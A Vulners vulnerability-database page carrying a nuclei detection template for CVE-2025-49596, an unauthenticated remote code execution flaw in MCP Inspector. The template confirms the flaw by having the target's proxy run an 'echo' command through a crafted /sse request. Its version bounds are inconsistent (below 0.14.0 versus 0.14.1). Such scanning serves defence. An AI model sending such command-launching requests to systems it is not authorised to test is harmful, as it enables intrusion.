Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 23 Views

Unauthenticated remote code execution in MCP Inspector before 0.14.1; upgrade to 0.14.1 or later.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC		The vulnerability of the mcp dev tool for testing and debugging MCP servers, MCP Inspector, allows a attacker to perform a CSRF attack.
4 Aug 202500:00
bdu_fstec
Circl		CVE-2025-49596
13 Jun 202520:35
circl
CNNVD		MCP Inspector 访问控制错误漏洞
13 Jun 202500:00
cnnvd
CVE		CVE-2025-49596
13 Jun 202520:11
cve
Cvelist		CVE-2025-49596 MCP Inspector proxy server lacks authentication between the Inspector client and proxy
13 Jun 202520:11
cvelist
EUVD		EUVD-2025-20870
3 Oct 202520:07
euvd
Github Security Blog		MCP Inspector proxy server lacks authentication between the Inspector client and proxy
13 Jun 202522:15
github
NVD		CVE-2025-49596
13 Jun 202520:15
nvd
OSV		CVE-2025-49596 MCP Inspector proxy server lacks authentication between the Inspector client and proxy
13 Jun 202520:11
osv
OSV		GHSA-7F8R-222P-6F5G MCP Inspector proxy server lacks authentication between the Inspector client and proxy
13 Jun 202522:15
osv
Rows per page
id: CVE-2025-49596

info:
  name: MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
  author: ye11oc4t
  severity: critical
  description: |
    The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio.
  impact: |
    Unauthenticated attackers can launch arbitrary MCP commands over stdio due to lack of authentication between Inspector client and proxy, enabling remote code execution.
  remediation: Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49596
    - https://github.com/modelcontextprotocol/inspector
    - https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979
    - https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g
    - https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
  classification:
    cve-id: CVE-2025-49596
    cwe-id: CWE-306
    epss-score: 0.3703
    epss-percentile: 0.9832
  metadata:
    verified: true
    fofa-query: title="MCP Inspector"
  tags: cve,cve2025,mcp,anthropic,unauth,passive,vkev,vuln,ai

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,"MCP Inspector")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: js
        group: 1
        part: body
        regex:
          - 'src="([^"]+\.js)"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}{{js}}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - compare_versions(version, '< 0.14.0')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        part: body
        regex:
          - 'const\s+version\s*=\s*"([0-9]+\.[0-9]+\.[0-9]+)'

  - method: GET
    path:
      - "{{BaseURL}}/sse?transportType=stdio&command=echo&args[]=hello-from-brower"

    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"endpoint","/message?sessionId=")
          - status_code == 200
        condition: and

    extractors:
      - type: regex
        name: session_id
        part: body
        group: 1
        regex:

          - '\/message\?sessionId=([a-z0-9-]+)' # Returns: Session ID as proof of execution
# digest: 4a0a0047304502204cf0444e29b34c26c43b906fdb06ad32b45c116565bde7c98dad37044a2c18e5022100dd1a861453d1ff77519062a293f252900e321736086515693b03837e364cf667:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
8.1High risk
Vulners AI Score8.1
CVSS 49.4
EPSS0.3703
SSVC
remote code executionunauthenticated accessmcp inspectormodel context inspectoranthropic
23